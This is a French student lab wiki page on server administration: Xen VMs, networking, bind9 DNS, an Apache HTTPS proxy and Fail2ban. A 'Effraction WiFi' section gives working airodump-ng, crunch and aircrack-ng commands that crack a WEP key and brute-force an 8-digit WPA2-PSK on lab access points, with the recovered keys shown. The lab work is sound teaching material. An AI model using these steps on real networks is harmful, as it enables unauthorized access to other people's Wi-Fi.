Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12361</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12361"/>
		<updated>2026-02-23T13:53:52Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* SSH depuis l'extérieur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite nous activons la translation d'adresse NAT.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Remarque : Pour que ces changements soient persistants, il faut installer le paquet &amp;lt;code&amp;gt;iptable-persistent&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
